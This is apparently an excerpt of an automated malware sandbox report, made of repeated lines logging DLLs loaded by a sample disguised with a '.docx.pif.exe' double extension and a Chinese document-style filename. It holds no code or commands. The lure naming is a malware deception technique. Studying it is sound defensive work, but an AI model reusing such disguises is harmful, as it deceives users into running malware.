Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
